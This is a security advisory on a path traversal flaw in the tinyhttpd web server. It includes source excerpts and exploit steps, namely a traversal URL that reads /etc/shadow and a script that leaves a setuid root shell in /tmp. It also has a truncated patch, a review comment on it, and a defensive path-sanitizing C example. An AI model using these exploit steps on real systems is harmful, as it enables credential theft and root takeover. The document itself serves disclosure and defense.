========================================
INetCop Security Advisory #2002-0x82-001
========================================

* Title: Multiple vulnerabilities in Tiny HTTPd.

0x01. Description

Tiny HTTP daemon is a very simple web server. It lets a remote client read
arbitrary local files, and the same flaw lets a remote client have arbitrary
files executed. It is also exposed to some buffer overflow vulnerabilities
(not detailed in this advisory).

The vulnerability can be found in the following lines of 'httpd.c'.
__
110         cgi = 1;
111     if (!cgi)                 // not a CGI, so read the file
112         serve_file(client, path);
113     else
114         execute_cgi(client, path, method, query_string);  // the CGI is executed
115     }
116     close(client);
117 }
--

serve_file() is at line 359:
__
359 void serve_file(int client, const char *filename)
...
367     resource = fopen(filename, "r");
...
373     cat(client, resource);
--

cat(), at line 143, sends the file it has read to the client:
__
143 void cat(int client, FILE *resource)
...
149     send(client, buf, strlen(buf), 0);
--

The function that executes a CGI is at line 185:
__
185 void execute_cgi(int client, const char *path,
186                  const char *method, const char *query_string)
...
249     execl(path, path, NULL);
250     exit(0);
--

The vulnerability exists because the web server does not filter "../" out of
the requested path before building the file name it opens or executes, so a
request can point anywhere on the filesystem. It can be exploited as follows.

0x02. Vulnerable Packages

Vendor site: http://tinyhttpd.sourceforge.net/

tinyhttpd 0.1.0
 -tinyhttpd-0.1.0.tar.gz
 +SunOS/Solaris
 +Linux
 +Other

0x03. Exploit

Remote file disclosure exploit and command execution exploit!

1) The web server runs with root privileges, so any local file can be read,
   for example:

   http://tiniwebserver/../../../../../../../etc/shadow

2) Local root can be obtained as follows. First write an executable script:

   bash$ cat > test; chmod +x test
   #!/bin/sh
   cp /bin/sh /tmp/sh
   chmod 4755 /tmp/sh
   ^C
   bash$

   Then request it through the web server. Because httpd.c treats the file as
   a CGI and runs it with execl() (line 249), and the server runs as root, the
   script leaves a root-owned setuid shell in /tmp:

   bash$ lynx http://localhost/../../../../../../../tmp/test
   bash$ /tmp/sh -i
   bash#

0x04. Patch

=== httpd.patch ===
--- httpd.c Sun Apr 22 09:13:13 2001
+++ httpd.patch.c Thu Oct 17 19:07:41 2002
@@ -55,6 +55,7 @@ char method[255]; char url[255]; char path[512]; + int t; size_t i, j; struct stat st; int cgi = 0; /* becomes true if server decides this is a CGI @@ -88,6 +89,15 @@ i++; j++; } url[i] = '\0'; + + for(t=0;t
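Review bot: the second hunk is cut off in the extracted text right after `for(t=0;t`, so the loop that is meant to reject "../" in `url` (inserted after `url[i] = '\0';`) cannot be reviewed here, and nothing in the visible lines shows what happens to a request that matches. Whatever the body does, a scan of `url` for the literal "../" is too narrow: it misses a final ".." segment with no slash after it, and any percent-encoded form such as "%2e%2e/" if anything downstream decodes the path. Suggest splitting the path on '/' and rejecting any ".." segment (and any encoded NUL), then confirming with realpath() that the file about to be opened or executed still lies under the document root. Minor: `+ int t;` as a loop index over `url` next to `size_t i, j;` invites a signed/unsigned comparison; use `size_t` for consistency.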
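The check described in 0x01 (the server appends the unfiltered request path to its document directory, so "../" walks out of it), shown as an added example. This is not tinyhttpd's code and not the patch above; it assumes the server maps "document root + request path" to a file and that the document root is a directory named htdocs, and the function names (url_decode, safe_path, path_maps_to, path_rejected) are ours. It goes a little beyond the advisory by also decoding percent-escapes and rejecting encoded NULs, which are the other two ways a request can escape a "../" string match.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed document root; tinyhttpd's own layout is not shown in the advisory. */
#define DOCROOT "htdocs"

/* Percent-decode `in` into `out`. Returns 0 on a malformed escape, on an
 * encoded NUL (which would silently truncate the C string), or on overflow. */
static int url_decode(const char *in, char *out, size_t outlen)
{
    size_t o = 0;
    for (size_t i = 0; in[i] != '\0'; i++) {
        int c = (unsigned char)in[i];
        if (c == '%') {
            if (!isxdigit((unsigned char)in[i + 1]) ||
                !isxdigit((unsigned char)in[i + 2]))
                return 0;
            char hex[3] = { in[i + 1], in[i + 2], '\0' };
            c = (int)strtol(hex, NULL, 16);
            i += 2;
        }
        if (c == 0 || o + 1 >= outlen)
            return 0;
        out[o++] = (char)c;
    }
    out[o] = '\0';
    return 1;
}

/* Map a request path onto DOCROOT. Segments are normalized lexically:
 * repeated slashes and "." are dropped, and any ".." segment rejects the
 * request outright (an explicit ".." has no legitimate use against a static
 * document root, so rejecting is simpler and safer than "popping" it).
 * Returns 1 and fills `out` on success, 0 on rejection. */
int safe_path(const char *url, char *out, size_t outlen)
{
    char dec[512], norm[512];
    size_t n = 0;
    const char *p;

    if (!url_decode(url, dec, sizeof dec))
        return 0;
    norm[n++] = '/';
    for (p = dec; *p != '\0'; ) {
        while (*p == '/') p++;          /* collapse "//" */
        if (*p == '\0') break;
        const char *seg = p;
        while (*p != '\0' && *p != '/') p++;
        size_t len = (size_t)(p - seg);
        if (len == 1 && seg[0] == '.')
            continue;                   /* "/./" adds nothing */
        if (len == 2 && seg[0] == '.' && seg[1] == '.')
            return 0;                   /* traversal attempt */
        if (n + len + 1 >= sizeof norm)
            return 0;
        memcpy(norm + n, seg, len);
        n += len;
        norm[n++] = '/';
    }
    if (n > 1) n--;                     /* drop trailing '/' except for "/" */
    norm[n] = '\0';
    int w = snprintf(out, outlen, "%s%s", DOCROOT, norm);
    return w >= 0 && (size_t)w < outlen;
}

/* Helpers: does `url` map to exactly `expected`, or is it rejected? */
int path_maps_to(const char *url, const char *expected)
{
    char out[1024];
    return safe_path(url, out, sizeof out) && strcmp(out, expected) == 0;
}

int path_rejected(const char *url)
{
    char out[1024];
    return !safe_path(url, out, sizeof out);
}

int main(void)
{
    /* Constructed probe requests, including the two from the advisory. */
    const char *probes[] = {
        "/index.html",
        "/../../../../../../../etc/shadow",
        "/../../../../../../../tmp/test",
        "/%2e%2e/%2e%2e/etc/shadow",     /* same traversal, percent-encoded */
        "/images/../../etc/shadow",
        "/index.html%00.cgi",
    };
    char out[1024];
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++)
        printf("%-36s -> %s\n", probes[i],
               safe_path(probes[i], out, sizeof out) ? out : "REJECTED");
    return 0;
}
```

Rejecting ".." lexically is enough to stop every request in 0x03, because both serve_file() and execute_cgi() receive the path this function would produce. It does not cover symlinks already sitting inside the document root; for that, a second layer that calls realpath() on the final name and checks the result starts with the resolved document root is the usual addition. Whether an executable file under htdocs gets run as a CGI (the `cgi = 1` decision at line 110) is a separate policy this check does not touch.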